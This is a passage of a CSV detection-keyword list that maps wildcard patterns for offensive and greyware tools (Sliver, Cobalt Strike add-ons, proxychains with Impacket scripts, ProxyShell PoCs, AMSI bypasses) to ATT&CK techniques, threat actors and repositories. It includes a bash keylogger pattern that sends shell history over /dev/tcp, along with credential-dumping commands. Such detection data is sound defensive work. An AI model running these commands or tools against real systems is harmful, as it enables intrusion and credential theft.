- T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*profiles generate --save *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*profiles new beacon *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*profiles new --mtls *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*ProgIDsUACBypass.*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*program/replay.pl*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*projectdiscovery/interactsh*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C12,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*PROMPT_COMMAND=*history -a* tail *.bash_history > /dev/tcp/127.0.0.1/*,greyware_tool_keyword,bash,Bash Keylogger,T1059 - T1003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*prosody2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*prowler gcp --credentials-file path*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Proxmark*,offensive_tool_keyword,Proxmark,The proxmark3 is a powerful general purpose RFID tool. the size of a deck of cards. designed to snoop. listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.,T1210 - T1561 - T1336 - T1335,TA0002 - TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/Proxmark/proxmark3,1,1,N/A,N/A,10,2872,891,2021-03-30T06:59:59Z,2014-03-16T23:36:31Z -*proxmark3 -p /dev/ttyACM0*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Proxy bypass enabled for Neo4j connection*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*Proxy Shellcode Handler*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,0,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*proxy.py --dns * --dns_port * --clients*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,0,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*proxy_bypass.py*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*proxy_cmd_for_exec_by_sibling*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*proxy_linux_amd64*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*proxychains -*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains atexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains dcomexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains nmap -sT * -p * -Pn -A*,offensive_tool_keyword,ligolo,proxychains used with ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*proxychains nmap*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains psexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains rdesktop *,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*proxychains secretsdump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains smbclient -L *,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains smbexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains telnet*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains wmiexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains*scshell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*proxychains.conf*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains.lsm*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains.sourceforge.net*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains-master*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,1,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains-other.conf*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,1,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*Proxy-DLL-Loads*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*proxyDllLoads.c*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*proxyDllLoads.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*proxyLogon.py*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*proxyshell.py*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*proxyshell_rce.py*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc,1,1,N/A,N/A,,N/A,,, -*proxyshellcodeurl*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*proxyshell-enumerate.py*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc,1,1,N/A,N/A,,N/A,,, -*proxyshell-poc*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc,1,1,N/A,N/A,,N/A,,, -*ps_token2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ps_wmi_exec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ps2exe -*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,0,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*ps2exe *.ps1*.exe*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,0,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*ps2exe.ps1*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*ps2exe.psd1*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*ps2exe.psm1*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*PS2EXE-master*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*PSAmsiClient.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*PSAmsiScanner.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*PSAttack*,offensive_tool_keyword,PSAttack,PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. Its designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. It does this with in a couple of ways.,T1059 - T1112 - T1055 - T1566,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/jaredhaight/PSAttack,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PSBits*NetShRun*,greyware_tool_keyword,NetshRun,Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want,T1546.008 - T1112 - T1037 - T1055 - T1218.001,TA0003 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/gtworek/PSBits/blob/master/NetShRun,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*PSByPassCLM*,offensive_tool_keyword,PSByPassCLM,Bypass for PowerShell Constrained Language Mode,T1027 - T1059 - T1218 - T1086 - T1089,TA0002 - TA0008 - TA0007,N/A,N/A,Defense Evasion,https://github.com/padovah4ck/PSByPassCLM,1,0,N/A,N/A,3,280,45,2021-12-23T16:29:01Z,2018-09-13T07:27:18Z -*psc4re/NSE-scripts*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*PSconfusion.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 